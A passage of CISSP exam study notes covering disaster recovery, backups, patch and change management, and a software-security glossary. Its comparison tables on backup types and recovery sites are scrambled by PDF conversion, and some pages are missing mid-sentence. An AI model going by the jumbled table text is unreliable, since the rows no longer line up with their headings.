ransomware: type of malware that typically encrypts a system or a network of systems, effectively
locking users out, and then demands a ransom payment (usually in the form of a digital currency)
to gain access to the decryption key
rootkit: Similar to stealth malware, a rootkit attempts to mask its presence on a system; malware
that embeds itself deeply in an OS; term is derived from the concept of rooting and a utility kit of
hacking tools; rooting is gaining total or full control over a system; typically includes a collection of
malware tools that an attacker can utilize according to specific goals
zero-day: is any type of malware that's never been seen in the wild before, and the vendor of the
impacted product is unaware (or hasn't issued a patch), as are security companies that create anti-
malware software intended to protect systems; previously unreported vuln which can be potentially
exploited without risk of detection or prevention until system owner/developer detects and corrects
vuln; gets name from the "zero time" being the time at which the exploit or vuln is first identified by
the systems' owners or builders; AKA zero-hour exploit, zero-day attack; mitigations include basic
security practices including disabling unneeded protocols/services, using appropriate firewalls,
IDS/IPS, and honeypots
7.7.8 Machine learning and Artificial Intelligence (AI) based tools
AI: gives machines the ability to do things that a human can do better or allows a machine to perform
tasks that we previously thought required human intelligence
Machine Learning: a subset of AI and refers to a system that can improve automatically through
experience
an ML system starts with a set of rules or guidelines; ML techniques attempt to algorithmically
discover knowledge from datasets
an AI system starts with nothing and progressively learns the rules, creating its own algorithms as it
learns the rules and applies ML techniques based on these rules
Behavior-based detection is one way ML and AI can apply to cybersecurity
an admin relates a baseline of normal activities and traffic on a network; the baseline in this case is
similar to a set of rules given to a ML system
during normal operations, it detects anomalies and reports them; if the detection is a false positive
(incorrectly classifying a benign activity, system state, or configuration as malicious or vulnerable),
the ML system learns
An AI system starts without a baseline, monitors traffic and slowly creates its own baseline based on the
traffic it observes
as it creates the baseline it also looks for anomalies
an AI system also relies on feedback from admins to learn if alarms are valid or false positives
Neural networks: try to simulate the functioning of the human brain by arranging a series of layered
calculations to solve problems; neural networks require extensive training on a particular problem before
they are able to offer solutions
Expert systems: a branch of AI that uses knowledge-based systems to emulate the decision-making
ability of human experts; expert systems have two main components: a knowlege base that uses a series
of if/then rules, and an inference engine that harnesses that info to draw conclusions about other data
7.8 Implement and support patch and vulnerability management (OSG-10 Chpt 16)
145 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Vulnerability Management: activities necessary to identify, assess, prioritize, and remediate information
systems weaknesses
Vulnerability management includes routine vuln scans and periodic vuln assessments
vuln scanners can detect known security vulnerabilities and weaknesses, like the absence of patches or
weak passwords
vuln scanners generate reports that indicate the technical vulns of a system and are an effective check
for a patch management program
vuln assessments extend beyond just technical scans and can include review and audits to detect
vulnerabilities
Patch and vulnerability management processes work together to help protect an org against emerging threats;
patch management ensures that appropriate patches are applied, and vuln management helps verify that
systems are not vulnerable to known threats
Patch: (AKA updates, quick or hot fixes) a blanket term for any type of code written to correct bug or
vulnerability or to improve existing software performance; when installed, a patch directly modifies files or
device settings without changing the version number or release details of the related software component
in the context of security, admins are primarily concerned with security patches, which are patches that
affect a systemʼs vulns
Patch Management: systematic notification, identification, deployment, installation and verification of OS and
app code revisions known as patches, hot fixes, and service packs
an effective patch management program ensures that systems are kept up to date with current patches
by evaluating, testing, approving, and deploying appropriate patches
Patch Tuesday: several big-tech orgs (e.g. Microsoft, Adobe, Oracle etc) regularly release patches on the
second Tuesday of every month
Patch management is often intertwined with change and configuration management, ensuring that
documentation reflects changes; when an org doesn't have an effective patch management program, it can
experience outages and incidents from known issues that could have been prevented
There are three methods for determining patch levels:
agent: update software (agent) installed on devices
agentless: remotely connect to each device
passive: monitor traffic to infer patch levels
Deploying patches can be done manually or automatically
Common steps within an effective program:
evaluate patches: determine if they apply to your systems
test patches: test patches on an isolated, non-production system to determine if the patch causes any
unwanted side effects
approve the patches: after successful testing, patches are approved for deployment; itʼs common to use
Change Management as part of the approval process
deploy the patches: after testing and approval, deploy the patches; many orgs use automated methods to
deploy patches, via third-party or the software vendor
verify that patches are deployed: regularly test and audit systems to ensure they remain patched
regularly identifying vulns, evaluating them, and taking steps to mitigate risks associated with them
it isnʼt possible to eliminate risks, and it isnʼt possible to eliminate all vulnerabilities
a vuln management program helps ensure that an org is regularly evaluating vulns and mitigating those
that represent the greatest risk
one of the most common vulnerabilities within an org is an unpatched system, and so a vuln management
program will often work in conjunction with a patch management program
7.9 Understand and participate in change management processes (OSG-10 Chpt 16)
Change management: formal process an org uses to transition from the current state to a future state; typically
includes mechanisms to request, evaluate, approve, implement, verify, and learn the change; ensures that the
146 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
costs and benefits of changes are analyzed and changes are made in a controlled manner to reduce risks
Change management processes allow various IT experts to review proposed changes for unintended
consequences before implementing
Change management controls provide a process to control, document, track, and audit all system
changes
The change management process includes multiple steps that build upon each other:
Change request: a change request can come from any part of an org and pertain to almost any topic;
companies typically use some type of change management software
Assess impact: after a change request is made, however small the request might be, the impact of the
potential change must be assessed
Approval/reject: based on the requested change and related impact assessment, common sense plays a
big part in the approval process
Build and test: after approval, any change should be developed and tested, ideally in a test environment
Schedule/notification: prior to implementing any change, key stakeholders should be notified
Implement: after testing and notification of stakeholders, the change should be implemented; it's
important to have a roll-back plan, allowing personnel to undo the change
Validation: once implemented, senior management and stakeholders should again be notified to validate
the change
Document the change: documentation should take place at each step; it's critical to ensure all
documentation is complete and to identify the version and baseline related to a given change
When a change management process is enforced, it creates documentation for all changes to a system,
providing a trail of info if personnel need to reverse the change, or make the same change on other systems
Change management control is a mandatory element for some security assurance requirements (SARs) in the
ISO Common Criteria
7.10 Implement recovery strategies (OSG-10 Chpt 18)
Recovery strategy: a plan for restoring critical business components, systems, and operations following a
disruption
Disaster recovery (DR): set of practices that enable an organization to minimize loss of, and restore, mission-
critical technology infrastructure after a catastrophic incident
Business continuity (BC): set of practices that enables an organization to continue performing its critical
functions through and after any disruptive event
7.10.1 Backup storage strategies (e.g., cloud storage, onsite, offsite)
Backup strategies are driven by org goals and objectives and usually focus on backup and restore time as
well as storage needs; the goal is to determine how and where data is stored for recovery in case of data
loss, corruption, or disaster
3-2-1 rule:
3 copies of critical files
2 backups on different media
1 backup stored offsite
Onsite backup: storing backup data within the same location as the source data (AKA local backup);
onsite backups have the downside that if through some disaster you lose your source data, there is a
chance you could also lose your backup
Offsite backup: storing backup data at a different location from where the original data is stored; the
offsite location should be geographically remote from, or far enough away from the source data that a
147 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Backup storage best practices include keeping copies of the media in at least one offsite location
to provide redundancy should the primary location be unavailable, incapacitated, or destroyed;
common strategy is to store backups in a cloud service that is itself geographically redundant
Two common backup strategies:
. full backup on Monday night, then run differential backups every other night of the week
if a failure occurs Saturday morning, restore Mondayʼs full backup and then restore
only Fridayʼs differential backup
. full backup on Monday night, then run incremental backups every other night of the week
if a failure occurs Saturday morning, restore Mondayʼs full backup and then restore
each incremental backup in the original chronological order
Feature Full Backup Incremental Backup Differential Backup
Only backs up data that
Description Aallcomplete copy of has changed since the last Backs made
up all changes
since the last full
selected data backup (regardless of backup
type)
Storage Requires the most Requires the least storage Requires more space than
incremental but less than
Space storage space space full
Fastest, as it only copies Faster than full but slower
Backup Slowest, as it changed data since the than incremental, as it
Speed copies all data last backup copies all changes since
the last full backup
Slowest, as it may require Faster than incremental
Recovery Fastest, as all data multiple incremental since it requires the last
Speed is in one place backups to restore to a full backup and the last
specific point differential backup
Complex, as it depends on Less complex than
Simplest, with no a chain of backups from incremental, requires the
Complexity dependency on the last full backup to the last full backup and the
previous backups most recent incremental last differential backup for
backup restoration
When backup time Suitable for environments Ideal for environments
Best Use and storage space where daily changes are where storage space is a
are not issues Ideal minimal and quick backups concern but restoration
Case for less frequent time needs to be relatively
backups are necessary quick
Three main techniques used to create offsite copies of database content: electronic vaulting,
remote journaling, and remote mirroring
electronic vaulting: where database backups are moved to a remote site using bulk
transfers
remote journaling: data transfers are performed in a more expeditious manner; remote
journaling is similar to electronic vaulting in that transaction logs transferred to the remote
site are not applied to a live database server but are maintained in a backup device
remote mirroring: the most advanced db backup solution, and the most expensive, with
remote mirroring, a live db server is maintained at the backup site; the remote server
149 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
receives copies of the db modifications at the same time they are applied to the production
server at the primary site
7.10.2 Recovery site strategies (e.g., cold vs. hot, resource capacity agreements)
Non-disaster: service disruption with significant but limited impact
Disaster: event that causes an entire site to be unusable for a day or longer (usually requires alternate
processing facility)
Natural disaster: events that commonly threaten orgs including earthquakes, floods, storms, fires,
tsunamis, and volcanic eruptions
Human-caused disasters: explosions, electrical fires, terrorist acts, power outages and other utility
failures, hardware/software failures, labor difficulties, theft, vandalism, etc.
Catastrophe: major disruption that destroys the facility altogether
For disasters and catastrophes, an org has 3 basic options:
use a dedicated site that the org owns/operates
lease a commercial facility (hot, warm, cold site)
enter into a formal agreement with another facility/org
When a disaster interrupts a business, a disaster recovery plan should kick in nearly automatically
and begin providing support for recovery operations
in addition to improving your response capabilities, purchasing insurance can reduce the
impact of financial losses
Recovery site strategies consider multiple elements of an organization, such as people, data,
infrastructure, and cost, as well as factors like availability and location
When designing a disaster recovery plan, itʼs important to keep your goal in mind — the restoration
of workgroups to the point that they can resume their activities in their usual work locations
sometimes it's best to develop separate recovery facilities for different work groups
To recover your business operations with the greatest possible efficiency, you should engineer the
disaster recovery plan so that those business units with the highest priority are recovered first
Mutual Assistance Agreements (MAA): provide an inexpensive alternative to disaster recovery sites;
not commonly used because they are difficult to enforce; orgs participating in an MAA may also be shut
down by the same disaster, and MAAs raise confidentiality concerns
Resource Capacity Agreements: pre-arranged vendor agreements to secure the necessary resources
required after a disruptive event; the goal is to ensure an org has access to resources at a recovery site
7.10.3 Multiple processing sites
Building fully resilient recovery processes means including alternative processing sites for disaster
recovery scenarios; multiple processing sites increase geographic diversity as well as resilience to
calamitous events
One of the most important elements of the disaster recovery plan is the selection of alternate processing
sites to be used when the primary sites are unavailable
cold sites: standby facilities large enough to handle the processing load of an organization and
equipped with appropriate electrical and environmental support systems
a cold site has NO COMPUTING FACILITIES (hardware or software) preinstalled
a cold site has no active broadband comm links
advantages:
a cold site is the LEAST EXPENSIVE OPTION and perhaps the most practical
disadvantages:
tremendous lag to activate the site, often measured in weeks, which can yield a false
sense of security
difficult to test
150 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
warm sites: a warm site is better than a cold site because, in addition to the shell of a building,
basic equipment is installed
a warm site contains the data links and pre-configured equipment necessary to begin
restoring operations, but no usable data for information
unlike hot sites, however, warm sites do not typically contain copies of the clientʼs data
activation of a warm site typically takes at least 12 hours from the time a disaster is declared
hot sites: a fully operational offsite data processing facility equipped with hardware and software; a
backup facility that is maintained in constant working order, with a full complement of servers,
workstations, and comm links
a hot site is usually a subscription service
the data on the primary site servers is periodically or continuously replicated to
corresponding servers at the hot site, ensuring that the hot site has up-to-date data
advantages:
unsurpassed level of disaster recovery protection
disadvantages:
extremely costly, likely doubling an orgʼs budget for hardware, software and services,
and requires the use of additional employees to maintain the site
has (by definition) copies of all production data, and therefore increases your attack
surface
Mobile sites: non-mainstream alternatives to traditional recovery sites; usually configured as cold
or warm sites, if your DR plan depends on a workgroup recovery strategy, mobile sites are an
excellent way to implement that approach
Cloud computing: many orgs now turn to cloud computing as their preferred disaster
recovery option
some companies that maintain their own datacenters may choose to use these IaaS
options as backup service providers
Note: A hot site is a subscription service, while a redundant site, in contrast, is a site owned
and maintained by the org (and a redundant site may be "hot" in terms of capabilities)
the exam differentiates between a hot site (a subscription service) and a redundant
site (owned by the organization)
Cloud computing: organizations increasingly are turning to cloud computer (often via Iaas) as their
preferred disaster recovery option
7.10.4 System resilience, High Availability (HA), Quality of Service (QoS), and fault tolerance
System resilience: the ability of a system to maintain an acceptable level of service during an adverse
event
High Availability (HA): the use of redundant technology components to allow a system to quickly
recover from a failure after experiencing a brief disruption
Clustering: refers to a group of systems working together to handle workloads; often seen in
the context of web servers that use a load balancer to manage incoming traffic, and
distributes requests to multiple web servers (the cluster)
Redundancy: unlike a cluster, where all members work together, redundancy typically
involves a primary and secondary system; the primary system does all the work, and the
secondary system is in standby mode unless the primary system fails, at which time activity
can fail over to the secondary
Both clustering and redundancy include high availability as a by-product of their
configuration
Quality of Service (QoS): controls protect the availability of data networks under load
many factors contribute to the quality of the end-user experience and QoS attempts to
manage all of these factors to create an experience that meets business requirements
151 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
152 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Site
Recovery Cost Implications Time Implications for RTO
Method
High cost; a duplicate of the original site Minimal recovery time, designed for
Hot Site with full computer systems and near-
real-time replication of data and ready to
seamless takeover with data and systems
up-to-date, allowing for critical operations
take over operations immediately to continue with little to no downtime
Highest cost; essentially operates as an Instantaneous recovery, as the redundant
Redundant active-active configuration where both site is already running in parallel with the
Site sites are running simultaneously, fully primary site, ensuring no interruption in
mirroring each other service
7.11 Implement Disaster Recovery (DR) processes (OSG-10 Chpt 18)
Business Continuity Management (BCM): the process and function by which an organization is responsible
for creating, maintaining, and testing BCP and DRP plans
Business Continuity Planning (BCP): focuses on the survival of the business processes when something
unexpected impacts it
Disaster Recovery Planning (DRP): focuses on the recovery of vital technology infrastructure and systems
BCM, BCP, and DRP are ultimately used to achieve the same goal: the continuity of the business and its
critical and essential functions, processes, and services
The key BCP/DRP steps are:
Develop contingency planning policy
Conduct BIA
Identify controls
Create contingency strategies
Develop contingency plan
Ensure testing, training, and exercises
Maintenance
As part of the Business Impact Analysis (BIA), four key measurements for BCP and DRP procedures:
RPO (recovery point objective): max tolerable data loss measured in time
RTO (recovery time objective): max tolerable time to recover systems to a defined service level;
specifies the amount of time that business continuity planners find acceptable for the restoration of a
service after a disaster
WRT (work recovery time): max time available to verify system and data integrity as part of the
resumption of normal ops
MTD (max tolerable downtime): max time-critical system, function, or process can be disrupted before
unacceptable/irrecoverable consequences to the business
7.11.1 Response
A disaster recovery plan should contain simple yet comprehensive instructions for essential personnel to
follow immediately upon recognizing that a disaster is in progress or imminent
Emergency-response plans are often put together in a form of checklists provided to responders; arrange
the checklist tasks in order of priority, with the most important task first!
153 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
The response plan should include clear criteria for activation of the disaster recovery plan, define who has
the authority to declare a disaster, and then discuss notification procedures
7.11.2 Personnel
A disaster recovery plan should contain a list of personnel to contact in the event of a disaster
usually includes key members of the DRP team as well as critical personnel
Businesses need to make sure employees are trained on DR procedures and that they have the necessary
resources to implement the DR plan
Key activities involved in preparing people and procedures for DR include:
develop DR training programs
conduct regular DR drills
provide employees with necessary resources and tools to implement the DR plan
communicate the DR plan to all employees
7.11.3 Communications (e.g., methods)
Ensure that response checklists provide first responders with a clear plan to protect life and property and
ensure the continuity of operations
the notification checklist should be supplied to all personnel who might respond to a disaster
the information provided should include alternate means of content (e.g. mobile or alternate,
pagers etc) as well as backup contacts for each role
7.11.4 Assessment
When the DR team arrives on site, one of their first tasks is to assess the situation
this normally occurs in a rolling fashion, with the first responders performing a simple assessment
to triage the situation and get the disaster response under way
as the incident progresses more detailed assessments will take place to gauge effectiveness, and
prioritize the assignment of resources
7.11.5 Restoration
Note that recovery and restoration are separate concepts
Restoration: bringing a business facility and environment back to a workable state
Recovery: bringing business operations and processes back to a working state
System recovery includes the restoration of all affected files and services actively in use on the system at
the time of the failure or crash
When designing a disaster recovery plan, itʼs important to keep your goal in mind — the restoration of
workgroups to the point that they can resume their activities in their usual work locations
7.11.6 Training and awareness
As with a business continuity plan, it is essential that you provide training to all personnel who will be
involved in the disaster recovery effort
When designing a training plan consider the following:
orientation training for all new employees
initial training for employees taking on a new DR role for the first time
detailed refresher training for DR team members
brief awareness refreshers for all other employees
7.11.7 Lessons learned
A lessons learned session should be conducted at the conclusion of any disaster recovery operation or
other security incident
154 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
The lessons learned process is designed to provide everyone involved with the incident response effort
an opportunity to reflect on their individual roles and the teams overall response
Time is of the essence in conducting a lesson learned, before memories fade
Usually a lessons learned session is led by trained facilitators
NIST SP 800-61 offers a series of questions to use in the lessons learned process:
exactly what happened and at what times?
how well did staff and management perform in dealing with the incident?
were documented procedures followed?
were the procedures adequate?
were any steps or actions taken that might have inhibited the recovery?
what would the staff and management do differently the next time a similar incident occurs?
how could information sharing with other organizations have been improved?
what corrective actions can prevent similar incidents in the future?
what precursors or indicators should be watched for in the future to detect similar incidents?
what additional tools or resources are needed to detect, analyze, and mitigate future incidents?
The team leader to document the lessons learned in a report that includes suggested process
improvement actions
7.12 Test Disaster Recovery Plans (DRP) (OSG-10 Chpt 18)
Every DR plan must be tested on a periodic basis to ensure that the planʼs provisions are viable and that it meets
an orgʼs changing needs
Five main test types:
read-through/checklist tests
structured walk-throughs
simulation tests
parallel tests
full-interruption tests
7.12.1 Read-through/tabletop
Read-through test: one of the simplest to conduct, but also one of the most critical; copies of a DR plan
are distributed to the members of the DR team for review, accomplishing three goals:
ensure that key personnel are aware of their responsibilities and have that knowledge refreshed
periodically
provide individuals with an opportunity to review and update plans, removing obsolete info
helps identify situations in which key personnel have left the company and the DR responsibility
needs to be re-assigned (note that DR responsibilities should be included in job descriptions)
7.12.2 Walkthrough
Structured walk-through: AKA tabletop exercise, takes testing one step further, where members of the
DR team gather in a large conference room and role-play a disaster scenario
the team refers to their copies of the DR plan and discuss the appropriate responses to that
particular type of disaster
7.12.3 Simulation
Simulation tests: similar to the structured walk-throughs, where team members are presented with a
scenario and asked to develop an appropriate response
unlike a read-through and walk-through, some of these response measures are then tested
155 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
this may involve the interruption of noncritical business activities and the use of some operational
personnel
7.12.4 Parallel
Parallel tests: represent the next level, and involve relocating personnel to the alternate recovery site and
implementing site activation procedures
the relocated employees perform their DR responsibilities just as they would for an actual disaster
operations at the main facility are not interrupted
7.12.5 Full interruption
Full-interruption tests: operate like parallel tests, but involve actually shutting down operations at the
primary site and shifting them to the recovery site
these tests involve a significant risk (shutting down the primary site, transfer recovery ops, followed
by the reverse) and therefore are extremely difficult to arrange (management resistance to these
tests are likely)
7.12.6 Communications (e.g., stakeholders, test status, regulators)
Before starting DRP testing, it's important to inform all stakeholders on what to expect, including
scheduled timing, potential impacts, the goals of testing
During testing it's important to provide regular updates, especially for larger full-interruption testing,
ensuring that stakeholders are aware of progress, challenges, and end-time changes
Post-test debriefing sessions can be used to review outcomes, looking at successes and areas that need
improvement
Many industries with stringent regulations require specific DR testing plans, and keeping keeping
regulators informed is important for compliance as well as governance
7.13 Participate in Business Continuity (BC) planning and exercises (OSG-10 Chpt 3)
Business continuity planning addresses how to keep an org in business after a major disruption takes place
It's important to note that the scope is much broader than that of DR
A security leader will likely be involved, but not necessarily lead the BCP effort
The BCP life cycle includes:
Developing the BC concept
Assessing the current environment
Implementing continuity strategies, plans, and solutions
Training the staff
Testing, exercising, and maintaining the plans and solutions
7.14 Implement and manage physical security (OSG-10 Chpt 10)
Physical access control mechanisms deployed to control, monitor and manage access to a facility
Sections, divisions, or areas within a site should be clearly designated as public, private, or restricted with
appropriate signage
7.14.1 Perimeter security controls
A fence is a perimeter-defining device and can consist of:
stripes painted on the ground
chain link fences
barbed wire
concrete walls
156 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Acceptance: formal, structured hand-off of the completed software system to the customer org; usually
involves test, analysis and assessment activities
Accreditation: AKA Security Accreditation a formal declaration by a designated accrediting authority (DAA) that
an information system is approved to operate at an acceptable level of risk, based on the implementation an
approved set of technical, managerial, and procedural safeguards
ACID Test: data integrity provided by means of enforcing atomicity, consistency, isolation, and durability
policies
Aggregation: ability to combine non-sensitive data from separate sources to create sensitive info; note that
aggregation is a "security issue", where as inference is an attack (where an attacker can pull together pieces of
less sensitive info to derive info of greater sensitivity)
Arbitrary code: alternate set of instructions and data that an attacker attempts to trick a processor into
executing
Buffer overflow: source code vulnerability allowing access to data locations outside of the storage space
allocated to the buffer; can be triggered by attempting to input data larger than the size of the buffer
Bypass attack: attempt to bypass front-end controls of a database to access information
Certification: comprehensive technical security analysis of a system to ensure it meets all applicable security
requirements
CAB: Change Advisory Board purpose is to review and approve/reject proposed code changes
Citizen programmers: organizational members who codify work-related knowledge, insights, and ideas into
(varying degrees of) usable software; the process and result is ad hoc, difficult to manage, and usually bereft of
security considerations
Code protection/logic hiding: prevents one software unit from reading/altering the
source/intermediate/executable code of another software unit
Code reuse: reuse of code, rather than re-invented code means units of software (procedures/objects) means
higher productivity toward development requirements using correct, complete, safe code
Complete coverage: testing all of the functions of software
Concurrency: using a lock to allow an authorized user to make changes, then unlock the data element after
changes are complete
Object/Memory reuse: systems allocate/release and reuse memory/resources as objects to requesting
processes; data remaining in the object when it is reused is a potential security violation (i.e. data remanence)
CORBA: Common Object Request Broker Architecture is a set of standards addressing interoperability between
software and hardware products, residing on different machines across a network; providing object location and
use across a network
Configuration Control: process of controlling modifications to hardware, firmware, software, and
documentation to protect the information system against improper modifications prior to, during, and after
system implementation
Configuration Management (CM): collection of activities focused on establishing and maintaining integrity of
IT products and information systems, through the control of processes for initialization, changing and
monitoring the configurations of those products and systems throughout the system development lifecycle
159 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Covert Channels/Paths: a method used to pass information over a path that is not normally used for
communication; communication pathways that violate security policy or requirement (deliberately or
unwittingly); basic types are timing and storage
Data Contamination: attackers attempt to use malformed inputs, at the field, record, transaction, or file level, in
an attempt to disrupt the proper functioning of the system
Data Lake: a data warehouse incorporating multiple types of streams of unstructured or semi-structured data
Data Mining: analysis and decision-making technique that relies on extracting deeper meanings from many
different instances and types of data; often applied to data warehouse content
Data Modeling: design process that identifies all data elements that the system will need to input, create, store,
modify, output, and destroy during operational use; should be one of the first steps in analysis and design
Data Protection and Data Hiding: restricts or prevents one software unit from reading or altering the private
data of another software unit or in preventing data from being discovered or accessed by a subject
Data Type Enforcement: how a language protects a developer from trying to perform operations on dissimilar
types of data, or in ways that would lead to erroneous results
Data Warehouse: collection of data sources such as separate internal databases to provide a broader base of
info for analysis, trending and reference; may also involve databases from outside the org
Data-centric Threat Modeling: methodology and framework focusing on the authorized movements and data
input/output into and from a system; corresponds with protecting data in transit, at rest, and in use when
classifying organizational data
Defensive Programming: design/coding allowing acceptable but sanitized data inputs to a system; lack of
defensive programming measures can result in arbitrary code execution, misdirection of the program to other
resources/locations, or reveal info useful to an attacker
Design Reviews: should take place after the development of functional and control specifications but before
the creation of code
Dirty read: occurs when one transaction reads a value from a database that was written by another transaction
that didn't commit
Emerging Properties: an alternate/more powerful way of looking at systems-level behavior characteristics such
as safety and security; helps provide a more testable, measurable answer to questions such as "how secure is
our system?"
Encapsulation: note see network Encapsulation in Domain 4 (disambiguation); enforcement of data/code hiding
during all phases of software development and operational use; bundling together data and methods is the
process of encapsulation (opposite of unpacking/revealing)
Executable/Object Code: binary representation of the machine language instruction set that the CPU and other
hardware of the target computer can directly execute
XML: Extensible Markup Language is a set of HTML extensions providing for data storage and transport in
networked environments; frequently used to integrate web pages with databases; XML is often embedded in the
HTML files making up elements of a web page
Functional requirements: describes a finite task or process the system must perform; often directly traceable
to specific elements in the final system's design and construction
Hierarchical database model: data elements and records are arranged in tree-like parent-child structures
160 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Instance: in object-oriented programming, an "instance of a class" refers to a specific object created from that
class, which is a blueprint or template defining the characteristics and behaviors of objects
Integrated Product and Process Development (IPPD): management technique that simultaneously integrates
essential acquisition activities through the use of multidisciplinary teams to optimize the design, manufacturing,
and supportability processes
Integrated Product Team: team of stakeholders and individuals that possess different skills and who work
together to achieve a defined process or product
Infrastructure as Code (IaC): instead of viewing hardware config as a manual, direct hands-on, one-on-one
admin hassle, it is viewed as just another collection of elements to be managed in the same way that software
and code are managed under DevSecOps
Interactive Application Security Testing (IAST): testing that combines or integrates SAST and DAST to
improve testing and provide behavioral analysis capabilities to pinpoint the source of vulnerabilities
Knowledge Discovery in Database (KDD): mathematical, statistical, and visualization method of identifying
valid and useful patterns in data
Knowledge Management: efficient/effective management of info and associated resources in an enterprise to
drive business intelligence and decision-making; may include workflow management, business process
modeling, doc management, db and info systems and knowledge-based systems
Level of abstraction: how closely a source-code/design doc represents the details of the underlying
object/system/component; lower-level abstractions generally have more detail than high-level ones
Living off the land (non-malware based ransom attack): system attack where the system/resources
compromised are used in pursuit of additional attacks (i.e. the attacker's agenda); anti-malware defense doesn't
detect/prevent the attack given the attacker's methodology
Malformed input attack: not currently handling input data is a common source of code errors that can result in
arbitrary code exec, or misdirection of the program to other resources/locations
Markup Language: non-programming language used to express formatting or arrangement of data on a
page/screen; usually extensible, allowing users to define additional/other operations to be performed; they
extend the language into a programming language (e.g. in the same way JavaScript extends HTML)
Metadata: info that describes the format or meaning of other data, which can be used to provide a systematic
method for describing resources and improving info retrieval
Mobile code (executable content): file(s) sent by a system to others, that will either control the execution of
systems/applications on that client or be directly executed
Modified prototype model: approach to system design/build that starts with a simplified version of the
application; feedback from stakeholders is used to improve design of a second version; this is repeated until
owners/stakeholders are satisfied with the final product
Network database model: database model in which data elements and records are arranged in arbitrary linked
fashion (.e.g lists, clusters, or other network forms)
Nonfunctional requirements: broad characteristics that do not clearly align with system elements; many
safety, security, privacy, and resiliency can be deemed nonfunctional
Object: encapsulation of a set of data and methods that can be used to manipulate that data
161 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Object-oriented database model: database model that uses object-oriented programming concepts like
classes, instances, and objects to organize, structure, and store data and methods; schemas define the
structure of the data, views specify table, rows, and columns that meet user/security requirements
Object-oriented security: systems security designs that make sue of object-oriented programming
characteristics such as encapsulation, inheritance, polymorphism, and polyinstantiation
Open-source software: source code and design info is made public, and often using licenses that allow
modification and refactoring
Pair programming: requires two devs to work together, one writing code, and the other reviewing and tracking
progress
Pass-around reviews: often done via email or code review system, allows devs to review code asynchronously
PERT: chart that uses nodes to represent milestones or deliverables, showing the estimated to to move
between milestones
Polyinstantiation: creates a new instance (copy) of a data item, with the same identifier or key, allowing each
process to have its own version of that data; useful for enforcing and protecting different security levels for a
shared resource; polyinstantiation also allows the storage of multiple different pieces of info in a database at
different classification levels to prevent attackers from inferring anything about the absence of info
Procedural programming: emphasizes the logical sequence of steps to be performed, where a procedure is a
set of software that performs a particular function, requiring specific input data, producing a specific set of
outputs, and procedures can invoke other procedures
Query attack: use of query tools to access data not normally allowed by the trusted front end, including the
views controlled by the query application; could also result from malformed queries using SQL to bypass
security controls; improper/incomplete checks on queries can be used in a similar way to bypass access
controls
Ransom attack: form of attack that threatens destruction, denial, or unauthorized public release/remarketing of
private information assets; usually involves encrypting assets and withhold the decryption key until a ransom is
paid by the victim
Refactoring: partial or complete rewrite of a set of software to perform the same functions, but in a more
straightforward, more efficient, or more maintainable form
Regression testing: test a system to ascertain whether recently approved modifications have changed
performance of other approved functions or introduced other unauthorized behavior;testing that runs a set of
known inputs against an app and compares to results previously produced (by an earlier version of the software)
Relational database model: AKA relational database management system (RDBMS), data elements and
records arranged in tables which are related or linked to each other to implement business logic, where data
records of different structures or types are needed together in the same activity
Representational State Transfer (REST): software architectural style for synchronizing the activities of two or
more apps running on different systems on a network; REST facilitates these processes exchanging state
information, usually via HTTP/S
Reputation monitoring: defensive tactic that uses the trust reputation of a website or IP address as a means of
blocking an org's users, processes or systems from connecting to a possible source of malware or exploitations;
possibly the only real defense against zero-day exploits; involves monitoring URLs, domains, IP addresses or
other similar info to separate untrustworthy traffic
162 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Runtime Application Security Protection (RASP): security agents comprised of small code units built into an
app which can detect set of security violations; upon detection, the RASP agent can cause the app to terminate,
or take other protective actions
Security Assessment: testing, inspection, and analysis to determine the degree to which a system meets or
exceeds the required security posture; may assess whether an as-built system meets the requirements in its
specs, or whether an in-use system meets the current perception of the real-world security threats
Software Quality Assurance: variety of formal and informal processes that attempt to determine whether a
software app or system meets all of its intended functions, doesn't perform unwanted functions, is free from
known security vulns, and is free from insertion or other errors in design and function
SDLC: Software Development LifeCycle is a framework and systematic associated with tasks that are performed
in a series of steps for building, deploying, and supporting software apps; begins with planning and
requirements gathering, and ends with decommissioning and sunsetting; there are many different SDLCs, such
as agile, DevSecOps, rapid prototyping, offering different approaches to defining and managing the software
lifecycle
Source code: program statements in human-readable form using a formal programming language's rules for
syntax and semantics
Spyware/Adware: software that performs a variety of monitoring and data gathering functions; AKA potentially
unwanted programs/applications (PUP/PUA), may be used in monitoring employee activities/use of resources
(spyware), or advertising efforts (adware); both may be legit/authorized by system owners or unwanted
intruders
Strong data typing: feature of a programming language preventing data type mismatch errors; strongly typed
languages will generate errors at compile time
Threat surface: total set of penetrations of a boundary or perimeter that surrounds or contains system
elements
TOCTOU attack: time of check vs time of use (TOCTOU) attack takes advantage of the time delay between a
security check (such as authentication or authorization) being performed and actual use of the asset
Trapdoor/backdoor: AKA maintenance hook; hidden mechanism that bypasses access control measures; an
entry point into an architecture or system that is inserted in software by devs during development to provide a
method of gaining access for modification/support; can also be inserted by an attacker, bypassing access
control measures designed to prevent unauthorized software changes
UAT: User Acceptance Testing typically the last phase of the testing process; verifies that the solution
developed meets user requirements, and validates against use cases
8.1 Understand and integrate security in the Software Development Life Cycle (SDLC)
(OSG-10 Chpt 20)
8.1.1 Development methodologies (e.g., Agile, Waterfall, DevOps, DevSecOps, Scaled Agile Framework)
Agile methodology: a project management approach to development that involves breaking the project
into phases and emphasizes continuous collaboration and improvement; teams follow a cycle of planning,
executing, and evaluating; focus is on iterative development and frequent feedback, collab between small
self-organizing cross-functional teams; in a very simplified sense, you can say agile is waterfall done in
sprints
Agile development emphasizes:
163 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
the delivery of working software in short iterations, helping to get the software to market
faster
reduced risk by frequently testing and providing feedback, helping to identify and resolve
issues earlier in the development process
